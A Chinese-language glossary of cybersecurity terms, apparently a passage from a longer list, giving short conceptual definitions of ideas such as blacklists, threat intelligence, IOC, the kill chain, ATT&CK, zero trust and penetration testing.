密钥加密技术的密码体制分为对称密钥体制和非对称密钥体制两种。相应地，对数据加密的技术分为两类，即对称加密（私人密钥加密）和非对称加密（公开密钥加密）。对称加密的加密密钥和解密密钥相同，而非对称加密的加密密钥和解密密钥不同，加密密钥可以公开而解密密钥需要保密。

黑名单

顾名思义，黑名单即不好的名单，凡是在黑名单上的软件、IP地址等，都被认为是非法的。

白名单

与黑名单对应，白名单即“好人”的名单，凡是在白名单上的软件、IP等，都被认为是合法的，可以在计算机上运行。

边界防御

以网络边界为核心的防御模型，以静态规则匹配为基础，强调把所有的安全威胁都挡在外网。

南北向流量

通常指数据中心内外部通信所产生的的流量。

东西向流量

通常指数据中心内部不同主机之间互相通信所产生的的流量。

规则库

网络安全的核心数据库，类似于黑白名单，用于存储大量安全规则，一旦访问行为和规则库完成匹配，则被认为是非法行为。所以有人也将规则库比喻为网络空间的法律。

下一代

网络安全领域经常用到，用于表示产品或者技术有较大幅度的创新，在能力上相对于传统方法有明显的进步，通常缩写为NG（NextGen）。

例如NGFW（下一代防火墙）、NGSOC（下一代安全管理平台）等。

大数据安全分析

区别于传统被动规则匹配的防御模式，以主动收集和分析大数据的方法，找出其中可能存在的安全威胁，因此也称数据驱动安全。

1. 安全可视化

指在网络安全领域中的呈现技术，将网络安全加固、检测、防御、响应等过程中的数据和结果转换成图形界面，并通过人机交互的方式进行搜索、加工、汇总等操作的理论、方法和技术。

NTA

网络流量分析（NTA）的概念是Gartner于2013年首次提出的，位列五种检测高级威胁的手段之一。

它融合了传统的基于规则的检测技术，以及机器学习和其他高级分析技术，用以检测企业网络中的可疑行为，尤其是失陷后的痕迹。

安全运营

贯穿产品研发、业务运行、漏洞修复、防护与检测、应急响应等一系列环节，实行系统的管理方法和流程，将各个环节的安全防控作用有机结合，保障整个业务的安全性。

威胁情报

根据Gartner的定义，威胁情报是某种基于证据的知识，包括上下文、机制、标示、含义和能够执行的建议，这些知识与资产所面临已有的或酝酿中的威胁或危害相关，可用于资产相关主体对威胁或危害的响应或处理决策提供信息支持。根据使用对象的不同，威胁情报主要分为人读情报和机读情报。

TTP

主要包括三要素，战术Tactics、技术Techniques和过程Procedures，是描述高级威胁组织及其攻击的重要指标，作为威胁情报的一种重要组成部分，TTP可为安全分析人员提供决策支撑。

IOC

中文名为失陷标示：用以发现内部被APT团伙、木马后门、僵尸网络控制的失陷主机，类型上往往是域名、URL等。

目前而言，IOC是应用最为广泛的威胁情报，因为其效果最为直接。一经匹配，则意味着存在已经失陷的主机。

杀伤链

杀伤链最早来源于军事领域，用于描述进攻一方各个阶段的状态。

在网络安全领域，这一概念最早由洛克希德-马丁公司提出，英文名称为KillChain，也称作网络攻击生命周期，包括侦查追踪、武器构建、载荷投递、漏洞利用、安装植入、命令控制、目标达成等七个阶段，来识别和防止入侵。

ATT&CK

可以简单理解为描述攻击者技战术的知识库。

MITRE在2013年推出了该模型，它是根据真实的观察数据来描述和分类对抗行为。ATT&CK将已知攻击者行为转换为结构化列表，将这些已知的行为汇总成战术和技术，并通过几个矩阵以及结构化威胁信息表达式（STIX）、指标信息的可信自动化交换（TAXII）来表示。

态势感知

是一种基于环境的、动态、整体地洞悉安全风险的能力，是以安全大数据为基础，从全局视角提升对安全威胁的发现识别、理解分析、响应处置能力的一种方式，最终是为了决策与行动，是安全能力的落地。

探针

也叫作网络安全探针或者安全探针，可以简单理解为赛博世界的摄像头，部署在网络拓扑的关键节点上，用于收集和分析流量和日志，发现异常行为，并对可能到来的攻击发出预警。

包检测

对于流量包、数据包进行拆包、检测的行为。

元数据

元数据（Metadata），又称中介数据、中继数据，为描述数据的数据（dataabout data），主要是描述数据属性（property）的信息，用来支持如指示存储位置、历史数据、资源查找、文件记录等功能。

欺骗检测

以构造虚假目标来欺骗并诱捕攻击者，从而达到延误攻击节奏，检测和分析攻击行为的目的。

逆向

常见于逆向工程或者逆向分析，简单而言，一切从产品中提取原理及设计信息并应用于再造及改进的行为，都是逆向工程。在网络安全中，更多的是调查取证、恶意软件分析等。

爬虫

网络爬虫（又称为网页蜘蛛，网络机器人，在FOAF社区中间，更经常的称为网页追逐者），是一种按照一定的规则，自动地抓取万维网信息的程序或者脚本。

防爬

意为防爬虫，主要是指防止网络爬虫从自身网站中爬取信息。网络爬虫是一种按照一定的规则，自动地抓取网络信息的程序或者脚本。

零信任

零信任并不是不信任，而是作为一种新的身份认证和访问授权理念，不再以网络边界来划定可信或者不可信，而是默认不相信任何人、网络以及设备，采取动态认证和授权的方式，把访问者所带来的的网络安全风险降到最低。

拟态防御

核心实现是一种基于网络空间内生安全机理的动态异构冗余构造（DynamicHeterogeneousRedundancy，DHR)，为应对网络空间中基于未知漏洞、后门或病毒木马等的未知威胁，提供具有普适创新意义的防御理论和方法。

区块链

英文名为blockchain，它是一个共享数据库，存储于其中的数据或信息，具有“不可伪造”、“全程留痕”、“可以追溯”、“公开透明”、“集体维护”等特征。

远程浏览器

鉴于浏览器往往成为黑客攻击的入口，因此将浏览器部署在远程的一个“浏览器服务器池”中。

这样一来，这些浏览器所在的服务器跟用户所在环境中的终端和网络是隔离的，从而使得客户所在网络的暴露面大大降低。

这种服务也类似于虚拟桌面、云手机等产品。

渗透测试

为了证明网络防御按照预期计划正常运行而提供的一种机制，通常会邀请专业公司的攻击团队，按照一定的规则攻击既定目标，从而找出其中存在的漏洞或者其他安全隐患，并出具测试报告和整改建议。

其目的在于不断提升系统的安全性。

安全众测

借助众多白帽子的力量，针对目标系统在规定时间内进行漏洞悬赏测试。

您在收到有效的漏洞后，按漏洞风险等级给予白帽子一定的奖励。通常情况下是按漏洞付费，性价比较高。

同时，不同白帽子的技能研究方向可能不同，在进行测试的时候更为全面。

代码审计

顾名思义就是检查源代码中的安全缺陷，检查程序源代码是否存在安全隐患，或者有编码不规范的地方，通过自动化工具或者人工审查的方式，对程序源代码逐条进行检查和分析，发现这些源代码缺陷引发的安全漏洞，并提供代码修订措施和建议。

NTLM验证

NTLM(NTLAN Manager)是微软公司开发的一种身份验证机制，从NT4开始就一直使用，主要用于本地的帐号管理。

数据脱敏

数据脱敏是指对某些敏感信息通过脱敏规则进行数据的变形，实现敏感隐私数据的可靠保护，主要用于数据的共享和交易等涉及大范围数据流动的场景。

SRC

即SecurityResponse Center，中文名为安全应急响应中心，主要职责为挖掘并公开收集机构存在的漏洞和其他安全隐患。

CISO

有时也被叫做CSO，即首席信息安全官，为机构的主要安全负责人。